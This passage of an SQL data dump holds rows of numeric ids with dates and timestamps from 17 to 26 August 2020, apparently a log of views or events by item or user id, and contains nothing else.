18:55:49'),(5053,1780,1,'2020-08-17','2020-08-17 21:56:09'),(5054,1877,1,'2020-08-17','2020-08-17 22:58:27'),(5055,2617,1,'2020-08-17','2020-08-17 23:08:17'),(5056,1598,1,'2020-08-18','2020-08-18 04:31:26'),(5057,2609,1,'2020-08-18','2020-08-18 09:17:25'),(5058,89,1,'2020-08-18','2020-08-18 12:27:46'),(5059,80,1,'2020-08-18','2020-08-18 12:44:21'),(5060,80,1,'2020-08-18','2020-08-18 12:44:22'),(5061,68,1,'2020-08-18','2020-08-18 12:46:00'),(5062,68,1,'2020-08-18','2020-08-18 12:46:01'),(5063,474,1,'2020-08-18','2020-08-18 12:54:20'),(5064,1600,1,'2020-08-18','2020-08-18 12:58:05'),(5065,80,1,'2020-08-18','2020-08-18 13:00:40'),(5066,2309,1,'2020-08-18','2020-08-18 13:28:29'),(5067,2769,1,'2020-08-18','2020-08-18 13:39:15'),(5068,1588,1,'2020-08-18','2020-08-18 13:55:28'),(5069,76,1,'2020-08-18','2020-08-18 14:18:30'),(5070,2457,1,'2020-08-18','2020-08-18 14:57:47'),(5071,2457,1,'2020-08-18','2020-08-18 14:58:06'),(5072,3102,1,'2020-08-18','2020-08-18 16:06:11'),(5073,1600,1,'2020-08-18','2020-08-18 16:42:23'),(5074,1604,1,'2020-08-18','2020-08-18 16:58:27'),(5075,1588,1,'2020-08-18','2020-08-18 17:00:32'),(5076,1582,1,'2020-08-18','2020-08-18 17:42:51'),(5077,1586,1,'2020-08-18','2020-08-18 18:33:36'),(5078,3109,1,'2020-08-18','2020-08-18 18:53:30'),(5079,3109,1,'2020-08-18','2020-08-18 18:54:20'),(5080,570,1,'2020-08-18','2020-08-18 19:19:26'),(5081,570,1,'2020-08-18','2020-08-18 19:21:44'),(5082,80,1,'2020-08-18','2020-08-18 19:28:23'),(5083,91,1,'2020-08-18','2020-08-18 20:34:17'),(5084,1600,1,'2020-08-18','2020-08-18 20:45:01'),(5085,72,1,'2020-08-18','2020-08-18 21:43:03'),(5086,2309,1,'2020-08-18','2020-08-18 21:59:14'),(5087,3107,1,'2020-08-18','2020-08-18 22:00:35'),(5088,89,1,'2020-08-18','2020-08-18 22:13:30'),(5089,2309,1,'2020-08-18','2020-08-18 23:03:37'),(5090,2769,1,'2020-08-18','2020-08-18 23:33:46'),(5091,1588,1,'2020-08-19','2020-08-19 00:16:11'),(5092,1600,1,'2020-08-19','2020-08-19 00:22:44'),(5093,486,1,'2020-08-19','2020-08-19 00:34:06'),(5094,2751,1,'2020-08-19','2020-08-19 01:22:57'),(5095,486,1,'2020-08-19','2020-08-19 01:29:31'),(5096,84,1,'2020-08-19','2020-08-19 02:19:16'),(5097,2156,1,'2020-08-19','2020-08-19 03:36:59'),(5098,72,1,'2020-08-19','2020-08-19 04:26:24'),(5099,477,1,'2020-08-19','2020-08-19 04:41:48'),(5100,1713,1,'2020-08-19','2020-08-19 04:47:41'),(5101,1870,1,'2020-08-19','2020-08-19 05:12:17'),(5102,2503,1,'2020-08-19','2020-08-19 05:26:40'),(5103,3027,1,'2020-08-19','2020-08-19 06:00:06'),(5104,335,1,'2020-08-19','2020-08-19 06:20:02'),(5105,1600,1,'2020-08-19','2020-08-19 08:40:17'),(5106,2309,1,'2020-08-19','2020-08-19 09:10:24'),(5107,2309,1,'2020-08-19','2020-08-19 10:11:19'),(5108,2609,1,'2020-08-19','2020-08-19 10:31:08'),(5109,80,1,'2020-08-19','2020-08-19 11:21:52'),(5110,3087,1,'2020-08-19','2020-08-19 12:44:01'),(5111,87,1,'2020-08-19','2020-08-19 12:44:45'),(5112,488,1,'2020-08-19','2020-08-19 12:45:05'),(5113,87,1,'2020-08-19','2020-08-19 12:45:20'),(5114,480,1,'2020-08-19','2020-08-19 12:45:27'),(5115,87,1,'2020-08-19','2020-08-19 12:45:33'),(5116,479,1,'2020-08-19','2020-08-19 12:45:36'),(5117,87,1,'2020-08-19','2020-08-19 12:46:02'),(5118,474,1,'2020-08-19','2020-08-19 12:46:12'),(5119,76,1,'2020-08-19','2020-08-19 12:46:26'),(5120,2159,1,'2020-08-19','2020-08-19 12:51:01'),(5121,3109,1,'2020-08-19','2020-08-19 13:02:20'),(5122,91,1,'2020-08-19','2020-08-19 13:23:15'),(5123,1588,1,'2020-08-19','2020-08-19 13:24:38'),(5124,2989,1,'2020-08-19','2020-08-19 13:37:53'),(5125,3107,1,'2020-08-19','2020-08-19 13:42:09'),(5126,3102,1,'2020-08-19','2020-08-19 14:02:28'),(5127,2309,1,'2020-08-19','2020-08-19 14:48:07'),(5128,1604,1,'2020-08-19','2020-08-19 15:16:48'),(5129,89,1,'2020-08-19','2020-08-19 15:41:48'),(5130,2769,1,'2020-08-19','2020-08-19 15:55:43'),(5131,76,1,'2020-08-19','2020-08-19 16:03:05'),(5132,1604,1,'2020-08-19','2020-08-19 16:58:45'),(5133,80,1,'2020-08-19','2020-08-19 17:03:15'),(5134,89,1,'2020-08-19','2020-08-19 17:22:54'),(5135,72,1,'2020-08-19','2020-08-19 17:43:17'),(5136,1588,1,'2020-08-19','2020-08-19 18:33:01'),(5137,570,1,'2020-08-19','2020-08-19 18:35:08'),(5138,1598,1,'2020-08-19','2020-08-19 18:35:49'),(5139,570,1,'2020-08-19','2020-08-19 18:35:55'),(5140,1598,1,'2020-08-19','2020-08-19 18:36:03'),(5141,2751,1,'2020-08-19','2020-08-19 19:03:01'),(5142,2420,1,'2020-08-19','2020-08-19 22:52:24'),(5143,1582,1,'2020-08-19','2020-08-19 23:32:33'),(5144,87,1,'2020-08-19','2020-08-19 23:47:46'),(5145,91,1,'2020-08-19','2020-08-19 23:52:22'),(5146,72,1,'2020-08-19','2020-08-19 23:56:27'),(5147,3051,1,'2020-08-19','2020-08-19 23:57:19'),(5148,80,1,'2020-08-19','2020-08-19 23:58:49'),(5149,335,1,'2020-08-19','2020-08-19 23:59:48'),(5150,89,1,'2020-08-20','2020-08-20 00:02:16'),(5151,1612,1,'2020-08-20','2020-08-20 00:04:57'),(5152,68,1,'2020-08-20','2020-08-20 00:06:44'),(5153,74,1,'2020-08-20','2020-08-20 00:08:06'),(5154,2751,1,'2020-08-20','2020-08-20 03:44:17'),(5155,2309,1,'2020-08-20','2020-08-20 07:10:57'),(5156,2609,1,'2020-08-20','2020-08-20 07:16:29'),(5157,80,1,'2020-08-20','2020-08-20 07:41:43'),(5158,2769,1,'2020-08-20','2020-08-20 08:19:53'),(5159,1588,1,'2020-08-20','2020-08-20 08:28:09'),(5160,91,1,'2020-08-20','2020-08-20 08:39:05'),(5161,1588,1,'2020-08-20','2020-08-20 08:45:08'),(5162,1600,1,'2020-08-20','2020-08-20 09:40:15'),(5163,87,1,'2020-08-20','2020-08-20 10:14:33'),(5164,1604,1,'2020-08-20','2020-08-20 10:29:51'),(5165,1604,1,'2020-08-20','2020-08-20 10:32:56'),(5166,3104,1,'2020-08-20','2020-08-20 10:33:00'),(5167,1604,1,'2020-08-20','2020-08-20 10:33:21'),(5168,76,1,'2020-08-20','2020-08-20 11:03:52'),(5169,91,1,'2020-08-20','2020-08-20 11:04:55'),(5170,2395,1,'2020-08-20','2020-08-20 13:03:21'),(5171,3006,1,'2020-08-20','2020-08-20 14:55:16'),(5172,80,1,'2020-08-20','2020-08-20 14:55:30'),(5173,2248,1,'2020-08-20','2020-08-20 15:35:17'),(5174,2609,1,'2020-08-20','2020-08-20 17:38:19'),(5175,2609,1,'2020-08-20','2020-08-20 17:39:24'),(5176,2161,1,'2020-08-21','2020-08-21 00:08:47'),(5177,2309,1,'2020-08-21','2020-08-21 00:49:43'),(5178,3087,1,'2020-08-21','2020-08-21 00:56:33'),(5179,2309,1,'2020-08-21','2020-08-21 01:00:27'),(5180,91,1,'2020-08-21','2020-08-21 10:13:11'),(5181,89,1,'2020-08-21','2020-08-21 10:15:51'),(5182,3083,1,'2020-08-21','2020-08-21 10:16:25'),(5183,91,1,'2020-08-21','2020-08-21 10:17:57'),(5184,2904,1,'2020-08-21','2020-08-21 11:51:41'),(5185,2904,1,'2020-08-21','2020-08-21 11:52:56'),(5186,84,1,'2020-08-21','2020-08-21 11:55:22'),(5187,89,1,'2020-08-21','2020-08-21 11:55:49'),(5188,91,1,'2020-08-21','2020-08-21 11:56:13'),(5189,1600,1,'2020-08-21','2020-08-21 12:07:53'),(5190,89,1,'2020-08-21','2020-08-21 12:11:37'),(5191,84,1,'2020-08-21','2020-08-21 12:15:21'),(5192,3117,1,'2020-08-21','2020-08-21 12:15:36'),(5193,87,1,'2020-08-21','2020-08-21 12:16:27'),(5194,87,1,'2020-08-21','2020-08-21 12:17:00'),(5195,89,1,'2020-08-21','2020-08-21 12:17:12'),(5196,91,1,'2020-08-21','2020-08-21 12:18:16'),(5197,91,1,'2020-08-21','2020-08-21 12:19:19'),(5198,3092,1,'2020-08-21','2020-08-21 12:19:56'),(5199,91,1,'2020-08-21','2020-08-21 12:20:16'),(5200,3117,1,'2020-08-21','2020-08-21 12:20:47'),(5201,3099,1,'2020-08-21','2020-08-21 12:21:01'),(5202,91,1,'2020-08-21','2020-08-21 12:22:25'),(5203,89,1,'2020-08-21','2020-08-21 12:22:54'),(5204,1582,1,'2020-08-21','2020-08-21 12:23:16'),(5205,1718,1,'2020-08-21','2020-08-21 12:23:31'),(5206,89,1,'2020-08-21','2020-08-21 12:23:49'),(5207,1582,1,'2020-08-21','2020-08-21 12:24:58'),(5208,1600,1,'2020-08-21','2020-08-21 20:17:14'),(5209,1614,1,'2020-08-21','2020-08-21 21:48:52'),(5210,1600,1,'2020-08-21','2020-08-21 22:36:20'),(5211,1600,1,'2020-08-22','2020-08-22 11:33:47'),(5212,1870,1,'2020-08-22','2020-08-22 13:04:37'),(5213,1709,1,'2020-08-22','2020-08-22 17:42:08'),(5214,2420,1,'2020-08-23','2020-08-23 04:07:09'),(5215,1870,1,'2020-08-23','2020-08-23 06:00:23'),(5216,2457,1,'2020-08-23','2020-08-23 19:13:49'),(5217,1604,1,'2020-08-23','2020-08-23 19:57:31'),(5218,1604,1,'2020-08-23','2020-08-23 19:58:38'),(5219,1600,1,'2020-08-23','2020-08-23 20:35:15'),(5220,1718,1,'2020-08-23','2020-08-23 22:21:39'),(5221,68,1,'2020-08-23','2020-08-23 22:30:57'),(5222,1588,1,'2020-08-23','2020-08-23 22:36:05'),(5223,2609,1,'2020-08-23','2020-08-23 23:58:44'),(5224,2609,1,'2020-08-24','2020-08-24 00:08:38'),(5225,1588,1,'2020-08-24','2020-08-24 00:20:11'),(5226,91,1,'2020-08-24','2020-08-24 00:20:54'),(5227,473,1,'2020-08-24','2020-08-24 00:23:01'),(5228,91,1,'2020-08-24','2020-08-24 00:24:13'),(5229,1588,1,'2020-08-24','2020-08-24 00:24:20'),(5230,1724,1,'2020-08-24','2020-08-24 00:24:46'),(5231,1588,1,'2020-08-24','2020-08-24 00:25:39'),(5232,1726,1,'2020-08-24','2020-08-24 00:25:50'),(5233,1588,1,'2020-08-24','2020-08-24 00:26:50'),(5234,1604,1,'2020-08-24','2020-08-24 05:29:00'),(5235,91,1,'2020-08-24','2020-08-24 06:58:55'),(5236,2309,1,'2020-08-24','2020-08-24 09:36:58'),(5237,80,1,'2020-08-24','2020-08-24 10:53:55'),(5238,80,1,'2020-08-24','2020-08-24 10:54:54'),(5239,80,1,'2020-08-24','2020-08-24 11:03:00'),(5240,2609,1,'2020-08-24','2020-08-24 15:27:58'),(5241,1588,1,'2020-08-24','2020-08-24 20:03:53'),(5242,2609,1,'2020-08-24','2020-08-24 20:24:26'),(5243,2503,1,'2020-08-25','2020-08-25 01:31:39'),(5244,72,1,'2020-08-25','2020-08-25 01:38:02'),(5245,3081,1,'2020-08-25','2020-08-25 01:53:34'),(5246,72,1,'2020-08-25','2020-08-25 02:04:59'),(5247,335,1,'2020-08-25','2020-08-25 02:17:40'),(5248,3090,1,'2020-08-25','2020-08-25 02:55:45'),(5249,68,1,'2020-08-25','2020-08-25 02:58:11'),(5250,76,1,'2020-08-25','2020-08-25 03:02:11'),(5251,2904,1,'2020-08-25','2020-08-25 03:08:33'),(5252,80,1,'2020-08-25','2020-08-25 03:14:10'),(5253,1600,1,'2020-08-25','2020-08-25 06:17:02'),(5254,3072,1,'2020-08-25','2020-08-25 07:26:36'),(5255,68,1,'2020-08-25','2020-08-25 07:28:01'),(5256,91,1,'2020-08-25','2020-08-25 07:29:18'),(5257,89,1,'2020-08-25','2020-08-25 07:31:05'),(5258,89,1,'2020-08-25','2020-08-25 07:33:53'),(5259,89,1,'2020-08-25','2020-08-25 07:35:26'),(5260,89,1,'2020-08-25','2020-08-25 07:35:53'),(5261,84,1,'2020-08-25','2020-08-25 07:36:47'),(5262,1870,1,'2020-08-25','2020-08-25 07:37:11'),(5263,3099,1,'2020-08-25','2020-08-25 07:38:31'),(5264,1600,1,'2020-08-25','2020-08-25 10:38:00'),(5265,1588,1,'2020-08-25','2020-08-25 11:26:04'),(5266,3072,1,'2020-08-25','2020-08-25 11:31:24'),(5267,1600,1,'2020-08-25','2020-08-25 11:31:34'),(5268,3117,1,'2020-08-25','2020-08-25 11:32:24'),(5269,2956,1,'2020-08-25','2020-08-25 11:33:49'),(5270,3117,1,'2020-08-25','2020-08-25 11:34:44'),(5271,2309,1,'2020-08-25','2020-08-25 11:36:17'),(5272,76,1,'2020-08-25','2020-08-25 12:18:01'),(5273,1600,1,'2020-08-25','2020-08-25 12:20:18'),(5274,1745,1,'2020-08-25','2020-08-25 12:21:29'),(5275,1600,1,'2020-08-25','2020-08-25 12:23:21'),(5276,3109,1,'2020-08-25','2020-08-25 12:23:58'),(5277,1600,1,'2020-08-25','2020-08-25 12:25:29'),(5278,3104,1,'2020-08-25','2020-08-25 12:25:42'),(5279,1600,1,'2020-08-25','2020-08-25 12:26:27'),(5280,1600,1,'2020-08-25','2020-08-25 12:31:44'),(5281,335,1,'2020-08-25','2020-08-25 12:32:48'),(5282,335,1,'2020-08-25','2020-08-25 12:34:58'),(5283,1588,1,'2020-08-25','2020-08-25 12:35:37'),(5284,89,1,'2020-08-25','2020-08-25 12:41:13'),(5285,1728,1,'2020-08-25','2020-08-25 12:41:22'),(5286,89,1,'2020-08-25','2020-08-25 12:42:26'),(5287,1602,1,'2020-08-25','2020-08-25 12:42:39'),(5288,2503,1,'2020-08-25','2020-08-25 12:43:06'),(5289,87,1,'2020-08-25','2020-08-25 12:46:06'),(5290,76,1,'2020-08-25','2020-08-25 12:47:49'),(5291,72,1,'2020-08-25','2020-08-25 12:48:26'),(5292,108,1,'2020-08-25','2020-08-25 12:52:52'),(5293,89,1,'2020-08-25','2020-08-25 12:55:12'),(5294,3083,1,'2020-08-25','2020-08-25 12:56:12'),(5295,1586,1,'2020-08-25','2020-08-25 12:56:47'),(5296,2617,1,'2020-08-25','2020-08-25 12:56:59'),(5297,89,1,'2020-08-25','2020-08-25 13:07:31'),(5298,3109,1,'2020-08-25','2020-08-25 13:20:08'),(5299,74,1,'2020-08-25','2020-08-25 13:20:22'),(5300,87,1,'2020-08-25','2020-08-25 13:20:24'),(5301,89,1,'2020-08-25','2020-08-25 13:20:39'),(5302,89,1,'2020-08-25','2020-08-25 13:20:43'),(5303,89,1,'2020-08-25','2020-08-25 13:20:43'),(5304,89,1,'2020-08-25','2020-08-25 13:20:58'),(5305,89,1,'2020-08-25','2020-08-25 13:21:03'),(5306,68,1,'2020-08-25','2020-08-25 13:21:03'),(5307,89,1,'2020-08-25','2020-08-25 13:21:09'),(5308,89,1,'2020-08-25','2020-08-25 13:21:17'),(5309,89,1,'2020-08-25','2020-08-25 13:21:31'),(5310,2503,1,'2020-08-25','2020-08-25 13:21:41'),(5311,2704,1,'2020-08-25','2020-08-25 13:22:06'),(5312,2658,1,'2020-08-25','2020-08-25 13:22:08'),(5313,1582,1,'2020-08-25','2020-08-25 13:22:11'),(5314,1582,1,'2020-08-25','2020-08-25 13:22:25'),(5315,1582,1,'2020-08-25','2020-08-25 13:22:45'),(5316,89,1,'2020-08-25','2020-08-25 13:23:04'),(5317,1582,1,'2020-08-25','2020-08-25 13:23:23'),(5318,1582,1,'2020-08-25','2020-08-25 13:23:30'),(5319,74,1,'2020-08-25','2020-08-25 13:23:32'),(5320,1544,1,'2020-08-25','2020-08-25 13:23:47'),(5321,89,1,'2020-08-25','2020-08-25 13:24:59'),(5322,89,1,'2020-08-25','2020-08-25 13:25:14'),(5323,89,1,'2020-08-25','2020-08-25 13:25:15'),(5324,89,1,'2020-08-25','2020-08-25 13:25:25'),(5325,1598,1,'2020-08-25','2020-08-25 13:25:34'),(5326,89,1,'2020-08-25','2020-08-25 13:25:36'),(5327,1582,1,'2020-08-25','2020-08-25 13:25:54'),(5328,1586,1,'2020-08-25','2020-08-25 13:26:06'),(5329,1582,1,'2020-08-25','2020-08-25 13:26:23'),(5330,89,1,'2020-08-25','2020-08-25 13:26:27'),(5331,89,1,'2020-08-25','2020-08-25 13:26:32'),(5332,89,1,'2020-08-25','2020-08-25 13:26:39'),(5333,1582,1,'2020-08-25','2020-08-25 13:26:42'),(5334,72,1,'2020-08-25','2020-08-25 13:26:43'),(5335,89,1,'2020-08-25','2020-08-25 13:27:04'),(5336,3006,1,'2020-08-25','2020-08-25 13:27:13'),(5337,89,1,'2020-08-25','2020-08-25 13:27:18'),(5338,89,1,'2020-08-25','2020-08-25 13:27:24'),(5339,1614,1,'2020-08-25','2020-08-25 13:27:31'),(5340,2769,1,'2020-08-25','2020-08-25 13:27:48'),(5341,89,1,'2020-08-25','2020-08-25 13:27:49'),(5342,68,1,'2020-08-25','2020-08-25 13:27:59'),(5343,91,1,'2020-08-25','2020-08-25 13:28:14'),(5344,2769,1,'2020-08-25','2020-08-25 13:28:14'),(5345,3006,1,'2020-08-25','2020-08-25 13:28:16'),(5346,3053,1,'2020-08-25','2020-08-25 13:28:19'),(5347,91,1,'2020-08-25','2020-08-25 13:28:24'),(5348,91,1,'2020-08-25','2020-08-25 13:28:27'),(5349,89,1,'2020-08-25','2020-08-25 13:28:35'),(5350,91,1,'2020-08-25','2020-08-25 13:28:36'),(5351,91,1,'2020-08-25','2020-08-25 13:28:36'),(5352,91,1,'2020-08-25','2020-08-25 13:28:53'),(5353,91,1,'2020-08-25','2020-08-25 13:29:16'),(5354,72,1,'2020-08-25','2020-08-25 13:29:23'),(5355,87,1,'2020-08-25','2020-08-25 13:29:29'),(5356,91,1,'2020-08-25','2020-08-25 13:29:36'),(5357,3090,1,'2020-08-25','2020-08-25 13:30:06'),(5358,2658,1,'2020-08-25','2020-08-25 13:30:41'),(5359,3102,1,'2020-08-25','2020-08-25 13:31:55'),(5360,76,1,'2020-08-25','2020-08-25 13:32:08'),(5361,2658,1,'2020-08-25','2020-08-25 13:32:17'),(5362,91,1,'2020-08-25','2020-08-25 13:32:31'),(5363,68,1,'2020-08-25','2020-08-25 13:32:32'),(5364,68,1,'2020-08-25','2020-08-25 13:32:35'),(5365,74,1,'2020-08-25','2020-08-25 13:32:35'),(5366,468,1,'2020-08-25','2020-08-25 13:32:59'),(5367,72,1,'2020-08-25','2020-08-25 13:33:08'),(5368,76,1,'2020-08-25','2020-08-25 13:34:46'),(5369,108,1,'2020-08-25','2020-08-25 13:34:51'),(5370,91,1,'2020-08-25','2020-08-25 13:35:11'),(5371,335,1,'2020-08-25','2020-08-25 13:35:33'),(5372,2904,1,'2020-08-25','2020-08-25 13:35:37'),(5373,2769,1,'2020-08-25','2020-08-25 13:36:28'),(5374,3006,1,'2020-08-25','2020-08-25 13:36:41'),(5375,72,1,'2020-08-25','2020-08-25 13:36:49'),(5376,91,1,'2020-08-25','2020-08-25 13:36:53'),(5377,91,1,'2020-08-25','2020-08-25 13:36:57'),(5378,80,1,'2020-08-25','2020-08-25 13:37:40'),(5379,68,1,'2020-08-25','2020-08-25 13:39:37'),(5380,89,1,'2020-08-25','2020-08-25 13:40:48'),(5381,89,1,'2020-08-25','2020-08-25 13:41:38'),(5382,91,1,'2020-08-25','2020-08-25 13:41:42'),(5383,91,1,'2020-08-25','2020-08-25 13:42:02'),(5384,91,1,'2020-08-25','2020-08-25 13:42:25'),(5385,91,1,'2020-08-25','2020-08-25 13:42:57'),(5386,1707,1,'2020-08-25','2020-08-25 13:43:08'),(5387,68,1,'2020-08-25','2020-08-25 13:43:08'),(5388,76,1,'2020-08-25','2020-08-25 13:43:13'),(5389,91,1,'2020-08-25','2020-08-25 13:43:29'),(5390,108,1,'2020-08-25','2020-08-25 13:43:40'),(5391,80,1,'2020-08-25','2020-08-25 13:44:03'),(5392,91,1,'2020-08-25','2020-08-25 13:46:39'),(5393,68,1,'2020-08-25','2020-08-25 13:47:02'),(5394,91,1,'2020-08-25','2020-08-25 13:47:11'),(5395,1582,1,'2020-08-25','2020-08-25 13:47:16'),(5396,76,1,'2020-08-25','2020-08-25 13:47:37'),(5397,76,1,'2020-08-25','2020-08-25 13:47:43'),(5398,68,1,'2020-08-25','2020-08-25 13:47:58'),(5399,74,1,'2020-08-25','2020-08-25 13:48:31'),(5400,87,1,'2020-08-25','2020-08-25 13:50:25'),(5401,80,1,'2020-08-25','2020-08-25 13:52:03'),(5402,84,1,'2020-08-25','2020-08-25 13:52:06'),(5403,91,1,'2020-08-25','2020-08-25 13:52:09'),(5404,89,1,'2020-08-25','2020-08-25 13:52:32'),(5405,2411,1,'2020-08-25','2020-08-25 13:52:33'),(5406,1724,1,'2020-08-25','2020-08-25 13:52:46'),(5407,2410,1,'2020-08-25','2020-08-25 13:53:28'),(5408,72,1,'2020-08-25','2020-08-25 13:53:37'),(5409,89,1,'2020-08-25','2020-08-25 13:54:06'),(5410,2419,1,'2020-08-25','2020-08-25 13:54:08'),(5411,1594,1,'2020-08-25','2020-08-25 14:13:12'),(5412,108,1,'2020-08-25','2020-08-25 15:08:14'),(5413,91,1,'2020-08-25','2020-08-25 15:10:33'),(5414,91,1,'2020-08-25','2020-08-25 15:10:55'),(5415,91,1,'2020-08-25','2020-08-25 15:13:08'),(5416,3127,1,'2020-08-25','2020-08-25 15:13:26'),(5417,91,1,'2020-08-25','2020-08-25 15:13:34'),(5418,3127,1,'2020-08-25','2020-08-25 15:14:17'),(5419,91,1,'2020-08-25','2020-08-25 15:14:23'),(5420,89,1,'2020-08-25','2020-08-25 15:14:44'),(5421,89,1,'2020-08-25','2020-08-25 15:15:13'),(5422,3127,1,'2020-08-25','2020-08-25 15:15:25'),(5423,3127,1,'2020-08-25','2020-08-25 15:15:46'),(5424,76,1,'2020-08-25','2020-08-25 15:15:46'),(5425,68,1,'2020-08-25','2020-08-25 15:15:49'),(5426,68,1,'2020-08-25','2020-08-25 15:15:49'),(5427,91,1,'2020-08-25','2020-08-25 15:16:06'),(5428,91,1,'2020-08-25','2020-08-25 15:17:11'),(5429,91,1,'2020-08-25','2020-08-25 15:18:02'),(5430,91,1,'2020-08-25','2020-08-25 15:19:07'),(5431,91,1,'2020-08-25','2020-08-25 15:19:13'),(5432,68,1,'2020-08-25','2020-08-25 15:19:43'),(5433,91,1,'2020-08-25','2020-08-25 15:20:23'),(5434,91,1,'2020-08-25','2020-08-25 15:21:00'),(5435,91,1,'2020-08-25','2020-08-25 15:21:00'),(5436,91,1,'2020-08-25','2020-08-25 15:21:00'),(5437,335,1,'2020-08-25','2020-08-25 15:21:46'),(5438,89,1,'2020-08-25','2020-08-25 15:22:01'),(5439,76,1,'2020-08-25','2020-08-25 15:22:06'),(5440,84,1,'2020-08-25','2020-08-25 15:22:26'),(5441,2063,1,'2020-08-25','2020-08-25 15:23:14'),(5442,2063,1,'2020-08-25','2020-08-25 15:23:16'),(5443,68,1,'2020-08-25','2020-08-25 15:24:29'),(5444,87,1,'2020-08-25','2020-08-25 15:24:36'),(5445,91,1,'2020-08-25','2020-08-25 15:26:53'),(5446,1728,1,'2020-08-25','2020-08-25 15:26:56'),(5447,91,1,'2020-08-25','2020-08-25 15:26:56'),(5448,91,1,'2020-08-25','2020-08-25 15:27:06'),(5449,91,1,'2020-08-25','2020-08-25 15:28:33'),(5450,108,1,'2020-08-25','2020-08-25 15:28:40'),(5451,91,1,'2020-08-25','2020-08-25 15:28:43'),(5452,91,1,'2020-08-25','2020-08-25 15:29:00'),(5453,2964,1,'2020-08-25','2020-08-25 15:29:05'),(5454,1734,1,'2020-08-25','2020-08-25 15:29:38'),(5455,1726,1,'2020-08-25','2020-08-25 15:31:52'),(5456,91,1,'2020-08-25','2020-08-25 15:32:19'),(5457,72,1,'2020-08-25','2020-08-25 15:35:13'),(5458,72,1,'2020-08-25','2020-08-25 15:35:32'),(5459,68,1,'2020-08-25','2020-08-25 15:36:17'),(5460,84,1,'2020-08-25','2020-08-25 15:36:34'),(5461,89,1,'2020-08-25','2020-08-25 15:37:25'),(5462,68,1,'2020-08-25','2020-08-25 15:38:06'),(5463,91,1,'2020-08-25','2020-08-25 15:38:13'),(5464,91,1,'2020-08-25','2020-08-25 15:38:39'),(5465,89,1,'2020-08-25','2020-08-25 15:40:13'),(5466,72,1,'2020-08-25','2020-08-25 15:40:18'),(5467,91,1,'2020-08-25','2020-08-25 15:40:38'),(5468,1743,1,'2020-08-25','2020-08-25 15:41:01'),(5469,72,1,'2020-08-25','2020-08-25 15:41:16'),(5470,91,1,'2020-08-25','2020-08-25 15:41:29'),(5471,1705,1,'2020-08-25','2020-08-25 15:41:37'),(5472,68,1,'2020-08-25','2020-08-25 15:42:30'),(5473,72,1,'2020-08-25','2020-08-25 15:43:59'),(5474,91,1,'2020-08-25','2020-08-25 15:47:35'),(5475,3102,1,'2020-08-25','2020-08-25 15:47:46'),(5476,1594,1,'2020-08-25','2020-08-25 15:50:32'),(5477,91,1,'2020-08-25','2020-08-25 18:37:03'),(5478,3102,1,'2020-08-25','2020-08-25 18:46:41'),(5479,91,1,'2020-08-25','2020-08-25 18:46:56'),(5480,91,1,'2020-08-25','2020-08-25 18:50:26'),(5481,3127,1,'2020-08-25','2020-08-25 18:54:21'),(5482,1604,1,'2020-08-25','2020-08-25 20:31:31'),(5483,2934,1,'2020-08-26','2020-08-26 00:34:47'),(5484,2457,1,'2020-08-26','2020-08-26 01:54:49'),(5485,68,1,'2020-08-26','2020-08-26 04:11:50'),(5486,89,1,'2020-08-26','2020-08-26 05:12:00'),(5487,1582,1,'2020-08-26','2020-08-26 05:12:18'),(5488,1612,1,'2020-08-26','2020-08-26 06:03:23'),(5489,1604,1,'2020-08-26','2020-08-26 07:16:41'),(5490,91,1,'2020-08-26','2020-08-26 07:27:09'),(5491,1726,1,'2020-08-26','2020-08-26 07:27:35'),(5492,2617,1,'2020-08-26','2020-08-26 10:16:59'),(5493,91,1,'2020-08-26','2020-08-26 10:25:12'),(5494,91,1,'2020-08-26','2020-08-26 10:33:15'),(5495,91,1,'2020-08-26','2020-08-26 10:36:38'),(5496,91,1,'2020-08-26','2020-08-26 10:37:49'),(5497,68,1,'2020-08-26','2020-08-26 10:41:27'),(5498,68,1,'2020-08-26','2020-08-26 10:41:35'),(5499,80,1,'2020-08-26','2020-08-26 10:41:56'),(5500,68,1,'2020-08-26','2020-08-26 10:41:59'),(5501,76,1,'2020-08-26','2020-08-26 10:42:08'),(5502,76,1,'2020-08-26','2020-08-26 10:42:09'),(5503,72,1,'2020-08-26','2020-08-26 10:45:23'),(5504,3127,1,'2020-08-26','2020-08-26 10:45:35'),(5505,3124,1,'2020-08-26','2020-08-26 10:45:55'),(5506,3127,1,'2020-08-26','2020-08-26 10:46:24'),(5507,108,1,'2020-08-26','2020-08-26 10:46:50'),(5508,3127,1,'2020-08-26','2020-08-26 10:47:43'),(5509,3127,1,'2020-08-26','2020-08-26 10:47:57'),(5510,80,1,'2020-08-26','2020-08-26 10:53:25'),(5511,72,1,'2020-08-26','2020-08-26 10:55:21'),(5512,72,1,'2020-08-26','2020-08-26 10:55:31'),(5513,80,1,'2020-08-26','2020-08-26 10:59:23'),(5514,335,1,'2020-08-26','2020-08-26 11:01:51'),(5515,108,1,'2020-08-26','2020-08-26 11:02:00'),(5516,2503,1,'2020-08-26','2020-08-26 11:02:48'),(5517,2503,1,'2020-08-26','2020-08-26 11:04:53'),(5518,80,1,'2020-08-26','2020-08-26 11:23:35'),(5519,80,1,'2020-08-26','2020-08-26 11:23:46'),(5520,2904,1,'2020-08-26','2020-08-26 11:28:02'),(5521,2904,1,'2020-08-26','2020-08-26 11:28:21'),(5522,80,1,'2020-08-26','2020-08-26 11:32:10'),(5523,91,1,'2020-08-26','2020-08-26 11:32:50'),(5524,1747,1,'2020-08-26','2020-08-26 11:33:43'),(5525,76,1,'2020-08-26','2020-08-26 11:42:00'),(5526,108,1,'2020-08-26','2020-08-26 11:51:13'),(5527,72,1,'2020-08-26','2020-08-26 12:00:30'),(5528,72,1,'2020-08-26','2020-08-26 12:09:35'),(5529,91,1,'2020-08-26','2020-08-26 12:40:30'),(5530,91,1,'2020-08-26','2020-08-26 12:40:30'),(5531,91,1,'2020-08-26','2020-08-26 12:40:34'),(5532,72,1,'2020-08-26','2020-08-26 12:48:36'),(5533,91,1,'2020-08-26','2020-08-26 13:54:54'),(5534,91,1,'2020-08-26','2020-08-26 13:57:44'),(5535,76,1,'2020-08-26','2020-08-26 14:10:39'),(5536,76,1,'2020-08-26','2020-08-26 14:21:55'),(5537,89,1,'2020-08-26','2020-08-26 14:25:07'),(5538,68,1,'2020-08-26','2020-08-26 14:26:40'),(5539,68,1,'2020-08-26','2020-08-26 14:26:40'),(5540,91,1,'2020-08-26','2020-08-26 14:27:19'),(5541,91,1,'2020-08-26','2020-08-26 14:27:24'),(5542,74,1,'2020-08-26','2020-08-26 14:29:53'),(5543,2503,1,'2020-08-26','2020-08-26 14:30:44'),(5544,91,1,'2020-08-26','2020-08-26 